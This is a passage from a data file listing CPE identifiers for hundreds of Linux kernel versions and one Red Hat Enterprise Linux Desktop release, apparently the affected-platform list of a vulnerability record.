"cpe:/o:linux:linux_kernel:2.6.14:rc3", "cpe:/o:linux:linux_kernel:2.6.27.36", "cpe:/o:linux:linux_kernel:3.9:rc3", "cpe:/o:linux:linux_kernel:4.4.54", "cpe:/o:linux:linux_kernel:2.6.15.9", "cpe:/o:linux:linux_kernel:2.3.11", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:4.4.48", "cpe:/o:linux:linux_kernel:2.6.31.7", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.18.40", "cpe:/o:linux:linux_kernel:2.6.22.10", "cpe:/o:linux:linux_kernel:2.6.27.40", "cpe:/o:linux:linux_kernel:2.6.35:rc2", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.10.3::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.9.11::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.6.32.16", "cpe:/o:linux:linux_kernel:3.12.22", "cpe:/o:linux:linux_kernel:2.6.33.1", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:2.6.32:rc8", "cpe:/o:linux:linux_kernel:2.6.30:rc4", "cpe:/o:linux:linux_kernel:2.3.50", "cpe:/o:linux:linux_kernel:3.19.4", "cpe:/o:linux:linux_kernel:2.6.9:rc3", "cpe:/o:linux:linux_kernel:2.6.16.38", "cpe:/o:linux:linux_kernel:2.1.101", "cpe:/o:linux:linux_kernel:2.1.2", "cpe:/o:linux:linux_kernel:3.17.7", "cpe:/o:linux:linux_kernel:3.10.47", "cpe:/o:linux:linux_kernel:3.4::~~~~x86~", "cpe:/o:linux:linux_kernel:2.6.27", "cpe:/o:linux:linux_kernel:2.6.25.18", "cpe:/o:linux:linux_kernel:2.6.17.12", "cpe:/o:linux:linux_kernel:2.6.36:rc3", "cpe:/o:linux:linux_kernel:3.0:rc7", "cpe:/o:linux:linux_kernel:2.6.37:rc2", "cpe:/o:linux:linux_kernel:3.12.25", "cpe:/o:linux:linux_kernel:3.2:rc3", "cpe:/o:linux:linux_kernel:3.14.25", "cpe:/o:linux:linux_kernel:3.12.27", "cpe:/o:linux:linux_kernel:2.6.16.16", "cpe:/o:linux:linux_kernel:3.4.112", "cpe:/o:linux:linux_kernel:3.4.71", "cpe:/o:linux:linux_kernel:3.18.8", "cpe:/o:linux:linux_kernel:3.10.102", "cpe:/o:linux:linux_kernel:3.12.35", "cpe:/o:linux:linux_kernel:4.4.92", "cpe:/o:linux:linux_kernel:2.6.39.1", "cpe:/o:linux:linux_kernel:2.6.28", "cpe:/o:linux:linux_kernel:2.6.16.2", "cpe:/o:linux:linux_kernel:2.6.24:rc4", "cpe:/o:linux:linux_kernel:3.0.93", "cpe:/o:linux:linux_kernel:3.0.77", "cpe:/o:linux:linux_kernel:3.10.90", "cpe:/o:linux:linux_kernel:2.6.38:rc7", "cpe:/o:linux:linux_kernel:4.4.104", "cpe:/o:linux:linux_kernel:4.4.122", "cpe:/o:linux:linux_kernel:4.4.72", "cpe:/o:linux:linux_kernel:2.6.0:test6", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:1.3.0", "cpe:/o:linux:linux_kernel:2.0.39", "cpe:/o:linux:linux_kernel:2.4.0:test7", "cpe:/o:linux:linux_kernel:2.6.32.52", "cpe:/o:linux:linux_kernel:2.6.27.50", "cpe:/o:linux:linux_kernel:3.0:rc4", "cpe:/o:linux:linux_kernel:2.6.20:rc5", "cpe:/o:linux:linux_kernel:2.6.26:rc9", "cpe:/o:linux:linux_kernel:3.4.80", "cpe:/o:linux:linux_kernel:2.1.125", "cpe:/o:linux:linux_kernel:2.6.25.19", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.14.27", "cpe:/o:linux:linux_kernel:2.5.43", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.76", "cpe:/o:linux:linux_kernel:2.6.20.17", "cpe:/o:linux:linux_kernel:3.10.0::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:2.6.20.7", "cpe:/o:linux:linux_kernel:3.10.99", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:2.6.28.5", "cpe:/o:linux:linux_kernel:3.4.36", "cpe:/o:linux:linux_kernel:2.5.0", "cpe:/o:linux:linux_kernel:3.18.36", "cpe:/o:linux:linux_kernel:2.4.31", "cpe:/o:linux:linux_kernel:2.6.26:rc6", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.14.79", "cpe:/o:linux:linux_kernel:2.1.89", "cpe:/o:linux:linux_kernel:4.4.15", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.10.63", "cpe:/o:linux:linux_kernel:3.0:rc2", "cpe:/o:linux:linux_kernel:2.5.68", "cpe:/o:linux:linux_kernel:2.6.27.28", "cpe:/o:linux:linux_kernel:3.10.68", "cpe:/o:linux:linux_kernel:2.1.96", "cpe:/o:linux:linux_kernel:2.1.15", "cpe:/o:linux:linux_kernel:2.1.7", "cpe:/o:linux:linux_kernel:3.0.78", "cpe:/o:linux:linux_kernel:2.1.32", "cpe:/o:linux:linux_kernel:2.6.39.4", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:linux:linux_kernel:3.18.45", "cpe:/o:linux:linux_kernel:2.4.18:pre5", "cpe:/o:linux:linux_kernel:2.6.12:rc2", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:2.6.20.20", "cpe:/o:linux:linux_kernel:2.6.32.46", "cpe:/o:linux:linux_kernel:2.6.27.44", "cpe:/o:linux:linux_kernel:2.6.38:rc4", "cpe:/o:linux:linux_kernel:2.6.17", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.14.33", "cpe:/o:linux:linux_kernel:4.1:rc7", "cpe:/o:linux:linux_kernel:4.4.61", "cpe:/o:linux:linux_kernel:2.1.130", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.1.16", "cpe:/o:linux:linux_kernel:4.4.34", "cpe:/o:linux:linux_kernel:4.1.44", "cpe:/o:linux:linux_kernel:4.4.60", "cpe:/o:linux:linux_kernel:4.9:rc5", "cpe:/o:linux:linux_kernel:3.4.82", "cpe:/o:linux:linux_kernel:3.13", "cpe:/o:linux:linux_kernel:3.16.6", "cpe:/o:linux:linux_kernel:2.6.36:rc8", "cpe:/o:linux:linux_kernel:4.7.3", "cpe:/o:linux:linux_kernel:3.10.41", "cpe:/o:linux:linux_kernel:2.5.29", "cpe:/o:linux:linux_kernel:2.6.16.31", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:2.6.36.1", "cpe:/o:linux:linux_kernel:2.6.33.12", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:2.3.35", "cpe:/o:linux:linux_kernel:2.6.27.17", "cpe:/o:linux:linux_kernel:2.1.70", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.18.56", "cpe:/o:linux:linux_kernel:2.6.20.4", "cpe:/o:linux:linux_kernel:2.1.18", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:2.2.13:pre15", "cpe:/o:linux:linux_kernel:2.6.38.4", "cpe:/o:linux:linux_kernel:2.6.25.16", "cpe:/o:linux:linux_kernel:3.1:rc1", "cpe:/o:linux:linux_kernel:2.1.36", "cpe:/o:linux:linux_kernel:3.4:rc4:~~~~x86~", "cpe:/o:linux:linux_kernel:4.9:rc6", "cpe:/o:linux:linux_kernel:2.6.16.52", "cpe:/o:linux:linux_kernel:3.4.68", "cpe:/o:linux:linux_kernel:2.6.27.34", "cpe:/o:linux:linux_kernel:2.1.109", "cpe:/o:linux:linux_kernel:2.0.24", "cpe:/o:linux:linux_kernel:2.2.2", "cpe:/o:linux:linux_kernel:4.8.9", "cpe:/o:linux:linux_kernel:3.18.37", "cpe:/o:linux:linux_kernel:2.6.27.56", "cpe:/o:linux:linux_kernel:3.4.4::~~~~x86~", "cpe:/o:linux:linux_kernel:3.14.46", "cpe:/o:linux:linux_kernel:3.4.97", "cpe:/o:linux:linux_kernel:2.6.31.14", "cpe:/o:linux:linux_kernel:3.14.11", "cpe:/o:linux:linux_kernel:3.4.38", "cpe:/o:linux:linux_kernel:2.6.23:rc7", "cpe:/o:linux:linux_kernel:3.4.60", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:4.1.15", "cpe:/o:linux:linux_kernel:4.8.7", "cpe:/o:linux:linux_kernel:3.4.45", "cpe:/o:linux:linux_kernel:3.0.85", "cpe:/o:linux:linux_kernel:2.2.11", "cpe:/o:linux:linux_kernel:2.6.24.3", "cpe:/o:linux:linux_kernel:3.14.15", "cpe:/o:linux:linux_kernel:3.4.86", "cpe:/o:linux:linux_kernel:4.1.14", "cpe:/o:linux:linux_kernel:2.4.18:pre9", "cpe:/o:linux:linux_kernel:4.6.5", "cpe:/o:linux:linux_kernel:2.5.59", "cpe:/o:linux:linux_kernel:3.9.7::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.6.0:test9", "cpe:/o:linux:linux_kernel:2.6.16.61", "cpe:/o:linux:linux_kernel:4.1.51", "cpe:/o:linux:linux_kernel:2.6.37.4", "cpe:/o:linux:linux_kernel:3.4.92", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:3.4.70", "cpe:/o:linux:linux_kernel:3.4.34", "cpe:/o:linux:linux_kernel:2.3.26", "cpe:/o:linux:linux_kernel:4.3:rc3", "cpe:/o:linux:linux_kernel:3.2.72", "cpe:/o:linux:linux_kernel:3.14:rc6", "cpe:/o:linux:linux_kernel:4.4.49", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.14.56", "cpe:/o:linux:linux_kernel:4.1.17", "cpe:/o:linux:linux_kernel:3.14:rc5", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.10.70", "cpe:/o:linux:linux_kernel:3.0.89", "cpe:/o:linux:linux_kernel:3.18.34", "cpe:/o:linux:linux_kernel:2.6.29", "cpe:/o:linux:linux_kernel:3.4.79", "cpe:/o:linux:linux_kernel:2.4.21:pre4", "cpe:/o:linux:linux_kernel:2.2.21:rc4", "cpe:/o:linux:linux_kernel:4.1.12", "cpe:/o:linux:linux_kernel:2.4.31:pre1", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:3.4.44", "cpe:/o:linux:linux_kernel:4.2.6", "cpe:/o:linux:linux_kernel:3.10.49", "cpe:/o:linux:linux_kernel:2.6.28:rc5", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:2.5.57", "cpe:/o:linux:linux_kernel:3.0.99", "cpe:/o:linux:linux_kernel:2.0.25", "cpe:/o:linux:linux_kernel:4.1.38", "cpe:/o:linux:linux_kernel:2.4.0:test2", "cpe:/o:linux:linux_kernel:4.5.4", "cpe:/o:linux:linux_kernel:2.6.25.9", "cpe:/o:linux:linux_kernel:3.10.40", "cpe:/o:linux:linux_kernel:4.4.16", "cpe:/o:linux:linux_kernel:3.18.14", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:2.1.22", "cpe:/o:linux:linux_kernel:2.6.25", "cpe:/o:linux:linux_kernel:4.3.3", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.1.88", "cpe:/o:linux:linux_kernel:2.6.23.15", "cpe:/o:linux:linux_kernel:2.4.18:pre6", "cpe:/o:linux:linux_kernel:3.16.7", "cpe:/o:linux:linux_kernel:2.6.21:rc6", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:4.1.46", "cpe:/o:linux:linux_kernel:3.13.11", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.35.8", "cpe:/o:linux:linux_kernel:3.4.59", "cpe:/o:linux:linux_kernel:2.6.0:test3", "cpe:/o:linux:linux_kernel:4.2.7", "cpe:/o:linux:linux_kernel:2.6.32.49", "cpe:/o:linux:linux_kernel:2.5.33", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:2.6.0:test5", "cpe:/o:linux:linux_kernel:3.10.6::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.6.24:rc1", "cpe:/o:linux:linux_kernel:3.10.85", "cpe:/o:linux:linux_kernel:2.2.15:pre16", "cpe:/o:linux:linux_kernel:4.4.110", "cpe:/o:linux:linux_kernel:2.3.16", "cpe:/o:linux:linux_kernel:2.3.5", "cpe:/o:linux:linux_kernel:2.6.23:rc3", "cpe:/o:linux:linux_kernel:3.4.56", "cpe:/o:linux:linux_kernel:2.2.27:rc2", "cpe:/o:linux:linux_kernel:3.14.1", "cpe:/o:linux:linux_kernel:3.10.55", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:3.10.86", "cpe:/o:linux:linux_kernel:2.6.16", "cpe:/o:linux:linux_kernel:2.1.117", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:2.6.11:rc4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:2.3.15", "cpe:/o:linux:linux_kernel:2.1.120", "cpe:/o:linux:linux_kernel:4.4.2", "cpe:/o:linux:linux_kernel:2.6.15:rc2", "cpe:/o:linux:linux_kernel:2.6.22.8", "cpe:/o:linux:linux_kernel:3.12.20", "cpe:/o:linux:linux_kernel:2.6.25.7", "cpe:/o:linux:linux_kernel:2.0.30", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:2.6.33.6", "cpe:/o:linux:linux_kernel:4.5.1", "cpe:/o:linux:linux_kernel:4.4.35", "cpe:/o:linux:linux_kernel:2.4.19:pre1", "cpe:/o:linux:linux_kernel:2.5.14", "cpe:/o:linux:linux_kernel:2.6.16:rc4", "cpe:/o:linux:linux_kernel:2.5.7", "cpe:/o:linux:linux_kernel:2.6.16.46", "cpe:/o:linux:linux_kernel:2.6.34.5", "cpe:/o:linux:linux_kernel:2.6.19.0", "cpe:/o:linux:linux_kernel:2.6.16.41", "cpe:/o:linux:linux_kernel:2.5.51", "cpe:/o:linux:linux_kernel:2.6.12:rc1", "cpe:/o:linux:linux_kernel:4.0.2", "cpe:/o:linux:linux_kernel:3.19.2", "cpe:/o:linux:linux_kernel:2.1.114", "cpe:/o:linux:linux_kernel:2.6.34.3", "cpe:/o:linux:linux_kernel:2.6.8:rc2", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:2.6.32.18", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:2.6.27.60", "cpe:/o:linux:linux_kernel:2.6.29.3", "cpe:/o:linux:linux_kernel:2.6.33.7", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:2.2.0", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:2.3.14", "cpe:/o:linux:linux_kernel:2.6.23:rc4", "cpe:/o:linux:linux_kernel:2.4.0:test6", "cpe:/o:linux:linux_kernel:2.6.18:rc7", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.4:rc6", "cpe:/o:linux:linux_kernel:2.6.25.4", "cpe:/o:linux:linux_kernel:3.18", "cpe:/o:linux:linux_kernel:2.6.15.11", "cpe:/o:linux:linux_kernel:3.12.6", "cpe:/o:linux:linux_kernel:2.6.22:rc5", "cpe:/o:linux:linux_kernel:4.1.35", "cpe:/o:linux:linux_kernel:4.4.91", "cpe:/o:linux:linux_kernel:2.6.34.10", "cpe:/o:linux:linux_kernel:2.6.24", "cpe:/o:linux:linux_kernel:3.14.12", "cpe:/o:linux:linux_kernel:4.7:rc4", "cpe:/o:linux:linux_kernel:2.3.38", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:3.10.30", "cpe:/o:linux:linux_kernel:2.6.27.31", "cpe:/o:linux:linux_kernel:2.6.16.45", "cpe:/o:linux:linux_kernel:4.9:rc8", "cpe:/o:linux:linux_kernel:2.6.26", "cpe:/o:linux:linux_kernel:4.8.10", "cpe:/o:linux:linux_kernel:2.6.25:rc3", "cpe:/o:linux:linux_kernel:3.12.7", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.1.27", "cpe:/o:linux:linux_kernel:2.6.17.7", "cpe:/o:linux:linux_kernel:3.10.79", "cpe:/o:linux:linux_kernel:3.4.49", "cpe:/o:linux:linux_kernel:2.6.21:rc4", "cpe:/o:linux:linux_kernel:4.5:rc4", "cpe:/o:linux:linux_kernel:2.1.64", "cpe:/o:linux:linux_kernel:2.6.26:rc2", "cpe:/o:linux:linux_kernel:2.5.34", "cpe:/o:linux:linux_kernel:2.2.19", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:2.5.11", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.12.43", "cpe:/o:linux:linux_kernel:3.18.57", "cpe:/o:linux:linux_kernel:2.6.22.18", "cpe:/o:linux:linux_kernel:2.6.3:rc1", "cpe:/o:linux:linux_kernel:3.14.45", "cpe:/o:linux:linux_kernel:3.18.21", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:linux:linux_kernel:2.6.15:rc4", "cpe:/o:linux:linux_kernel:2.4.33.4", "cpe:/o:linux:linux_kernel:2.6.16.28", "cpe:/o:linux:linux_kernel:2.6.13:rc2", "cpe:/o:linux:linux_kernel:4.4.134", "cpe:/o:linux:linux_kernel:3.4:rc1", "cpe:/o:linux:linux_kernel:2.1.55", "cpe:/o:linux:linux_kernel:2.6.18.4", "cpe:/o:linux:linux_kernel:2.6.21.3", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:2.6.32.23", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:2.6.34.8", "cpe:/o:linux:linux_kernel:4.7.6", "cpe:/o:linux:linux_kernel:2.6.26:rc7", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.10.54", "cpe:/o:linux:linux_kernel:2.1.3", "cpe:/o:linux:linux_kernel:2.5.65", "cpe:/o:linux:linux_kernel:2.6.25.6", "cpe:/o:linux:linux_kernel:2.6.29:rc7", "cpe:/o:linux:linux_kernel:3.14.47", "cpe:/o:linux:linux_kernel:2.6.32:rc7", "cpe:/o:linux:linux_kernel:3.14.51", "cpe:/o:linux:linux_kernel:4.4.76", "cpe:/o:linux:linux_kernel:3.0.70", "cpe:/o:linux:linux_kernel:4.4.14", "cpe:/o:linux:linux_kernel:2.6.18:rc5", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:3.0.101", "cpe:/o:linux:linux_kernel:2.6.36:rc1", "cpe:/o:linux:linux_kernel:3.4:rc5", "cpe:/o:linux:linux_kernel:3.0.97", "cpe:/o:linux:linux_kernel:2.6.26:rc1", "cpe:/o:linux:linux_kernel:2.4.11:pre3", "cpe:/o:linux:linux_kernel:2.1.54", "cpe:/o:linux:linux_kernel:3.12.41", "cpe:/o:linux:linux_kernel:3.10.23", "cpe:/o:linux:linux_kernel:3.12.32", "cpe:/o:linux:linux_kernel:2.5.22", "cpe:/o:linux:linux_kernel:3.9:rc7", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.9.1::~~~~arm64~", "cpe:/o:linux:linux_kernel:4.3", "cpe:/o:linux:linux_kernel:4.8.8", "cpe:/o:linux:linux_kernel:3.15", "cpe:/o:linux:linux_kernel:4.4.86", "cpe:/o:linux:linux_kernel:2.2.13", "cpe:/o:linux:linux_kernel:2.3.37", "cpe:/o:linux:linux_kernel:2.6.29:rc5", "cpe:/o:linux:linux_kernel:3.0.75", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.15.7", "cpe:/o:linux:linux_kernel:2.6.32.8", "cpe:/o:linux:linux_kernel:3.12.28", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:3.3:rc5", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:2.2.12", "cpe:/o:linux:linux_kernel:3.1:rc2", "cpe:/o:linux:linux_kernel:3.3:rc1", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:2.3.32", "cpe:/o:linux:linux_kernel:2.4.23:pre9", "cpe:/o:linux:linux_kernel:4.1.7", "cpe:/o:linux:linux_kernel:3.18.41", "cpe:/o:linux:linux_kernel:4.1.8", "cpe:/o:linux:linux_kernel:2.6.27.62", "cpe:/o:linux:linux_kernel:2.1.41", "cpe:/o:linux:linux_kernel:4.9:rc1", "cpe:/o:linux:linux_kernel:3.10.89", "cpe:/o:linux:linux_kernel:2.0.26", "cpe:/o:linux:linux_kernel:3.4.67", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:2.6.5:rc2", "cpe:/o:linux:linux_kernel:2.6.27:rc5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.22.21", "cpe:/o:linux:linux_kernel:3.12.51", "cpe:/o:linux:linux_kernel:3.16.5", "cpe:/o:linux:linux_kernel:2.6.34:rc7", "cpe:/o:linux:linux_kernel:3.12.24", "cpe:/o:linux:linux_kernel:3.12.48", "cpe:/o:linux:linux_kernel:3.12.12", "cpe:/o:linux:linux_kernel:2.0.0", "cpe:/o:linux:linux_kernel:2.6.31.6", "cpe:/o:linux:linux_kernel:2.6.30:rc8", "cpe:/o:linux:linux_kernel:2.3.44", "cpe:/o:linux:linux_kernel:2.1.77", "cpe:/o:linux:linux_kernel:3.12.53", "cpe:/o:linux:linux_kernel:3.4.35", "cpe:/o:linux:linux_kernel:3.14.35", "cpe:/o:linux:linux_kernel:2.6.16.24", "cpe:/o:linux:linux_kernel:3.14.24", "cpe:/o:linux:linux_kernel:2.6.16.58", "cpe:/o:linux:linux_kernel:2.6.19.4", "cpe:/o:linux:linux_kernel:3.18.15", "cpe:/o:linux:linux_kernel:3.10.97", "cpe:/o:linux:linux_kernel:2.5.47", "cpe:/o:linux:linux_kernel:4.1:rc5", "cpe:/o:linux:linux_kernel:4.4.10", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.10.33", "cpe:/o:linux:linux_kernel:3.18.66", "cpe:/o:linux:linux_kernel:2.1.62", "cpe:/o:linux:linux_kernel:3.18.27", "cpe:/o:linux:linux_kernel:2.6.39:rc6", "cpe:/o:linux:linux_kernel:2.6.25.2", "cpe:/o:linux:linux_kernel:2.6.25:rc5", "cpe:/o:linux:linux_kernel:2.6.30.3", "cpe:/o:linux:linux_kernel:4.4.83", "cpe:/o:linux:linux_kernel:2.3.99:pre7", "cpe:/o:linux:linux_kernel:2.6.32.42", "cpe:/o:linux:linux_kernel:4.7:rc6", "cpe:/o:linux:linux_kernel:4.4.38", "cpe:/o:linux:linux_kernel:2.6.30:rc2", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:2.6.28.2", "cpe:/o:linux:linux_kernel:3.4.84", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:3.10.45", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.10.2::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.4.21:pre7", "cpe:/o:linux:linux_kernel:2.1.121", "cpe:/o:linux:linux_kernel:2.6.15.8", "cpe:/o:linux:linux_kernel:4.9", "cpe:/o:linux:linux_kernel:4.4.44", "cpe:/o:linux:linux_kernel:2.6.32.6", "cpe:/o:linux:linux_kernel:2.4.3:pre3", "cpe:/o:linux:linux_kernel:2.6.33.11", "cpe:/o:linux:linux_kernel:2.6.3:rc3", "cpe:/o:linux:linux_kernel:2.6.35", "cpe:/o:linux:linux_kernel:3.18.10", "cpe:/o:linux:linux_kernel:4.0:rc5", "cpe:/o:linux:linux_kernel:2.6.27.59", "cpe:/o:linux:linux_kernel:4.4.13", "cpe:/o:linux:linux_kernel:2.6.17.6", "cpe:/o:linux:linux_kernel:2.4.32", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:2.0.31", "cpe:/o:linux:linux_kernel:2.0.38", "cpe:/o:linux:linux_kernel:2.6.27.52", "cpe:/o:linux:linux_kernel:3.2.73", "cpe:/o:linux:linux_kernel:3.13.1", "cpe:/o:linux:linux_kernel:3.4:rc3", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.10.4::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.4.102", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:2.6.13:rc4", "cpe:/o:linux:linux_kernel:4.7.1", "cpe:/o:linux:linux_kernel:2.6.33.19", "cpe:/o:linux:linux_kernel:2.6.37.5", "cpe:/o:linux:linux_kernel:3.12.47", "cpe:/o:linux:linux_kernel:2.2.4:rc1", "cpe:/o:linux:linux_kernel:2.6.22.14", "cpe:/o:linux:linux_kernel:2.0.1", "cpe:/o:linux:linux_kernel:3.4:rc5:~~~~x86~", "cpe:/o:linux:linux_kernel:3.15.4", "cpe:/o:linux:linux_kernel:4.4.28", "cpe:/o:linux:linux_kernel:2.6.27.45", "cpe:/o:linux:linux_kernel:4.5.2", "cpe:/o:linux:linux_kernel:4.4.31", "cpe:/o:linux:linux_kernel:3.10.74", "cpe:/o:linux:linux_kernel:2.1.49", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:2.6.22.13", "cpe:/o:linux:linux_kernel:2.4.29:rc2", "cpe:/o:linux:linux_kernel:2.6.22.17", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.14.23", "cpe:/o:linux:linux_kernel:3.18.38", "cpe:/o:linux:linux_kernel:3.10.7::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.0.8", "cpe:/o:linux:linux_kernel:2.6.20.1", "cpe:/o:linux:linux_kernel:2.6.16.54", "cpe:/o:linux:linux_kernel:3.14.16", "cpe:/o:linux:linux_kernel:2.6.27.48", "cpe:/o:linux:linux_kernel:2.6.27.37", "cpe:/o:linux:linux_kernel:3.18.18", "cpe:/o:linux:linux_kernel:3.4.2::~~~~x86~", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.6.33:rc7", "cpe:/o:linux:linux_kernel:2.6.32:rc4", "cpe:/o:linux:linux_kernel:2.6.14:rc4", "cpe:/o:linux:linux_kernel:2.6.31.1", "cpe:/o:linux:linux_kernel:4.3:rc5", "cpe:/o:linux:linux_kernel:2.1.81", "cpe:/o:linux:linux_kernel:2.6.36:rc7", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:2.6.35:rc4", "cpe:/o:linux:linux_kernel:2.4.18:pre8", "cpe:/o:linux:linux_kernel:2.3.24", "cpe:/o:linux:linux_kernel:3.18.59", "cpe:/o:linux:linux_kernel:2.6.21:rc2", "cpe:/o:linux:linux_kernel:2.2.22:rc2", "cpe:/o:linux:linux_kernel:3.10.29", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.12.16", "cpe:/o:linux:linux_kernel:3.4.100", "cpe:/o:linux:linux_kernel:3.14.20", "cpe:/o:linux:linux_kernel:2.6.17.4", "cpe:/o:linux:linux_kernel:2.3.27", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.4.34.2", "cpe:/o:linux:linux_kernel:2.6.32.58", "cpe:/o:linux:linux_kernel:3.0:rc6", "cpe:/o:linux:linux_kernel:4.4.75", "cpe:/o:linux:linux_kernel:2.0.20", "cpe:/o:linux:linux_kernel:3.18.63", "cpe:/o:linux:linux_kernel:2.6.25:rc8", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:2.6.30.6", "cpe:/o:linux:linux_kernel:2.6.32.31", "cpe:/o:linux:linux_kernel:4.2.5", "cpe:/o:linux:linux_kernel:2.6.16.6", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:2.6.24.4", "cpe:/o:linux:linux_kernel:2.5.27", "cpe:/o:linux:linux_kernel:2.6.25.15", "cpe:/o:linux:linux_kernel:4.5:rc3", "cpe:/o:linux:linux_kernel:3.10.34", "cpe:/o:linux:linux_kernel:2.4.32:pre1", "cpe:/o:linux:linux_kernel:2.6.22:rc3", "cpe:/o:linux:linux_kernel:2.6.33:rc2", "cpe:/o:linux:linux_kernel:2.1.110", "cpe:/o:linux:linux_kernel:2.6.32.9", "cpe:/o:linux:linux_kernel:4.4.93", 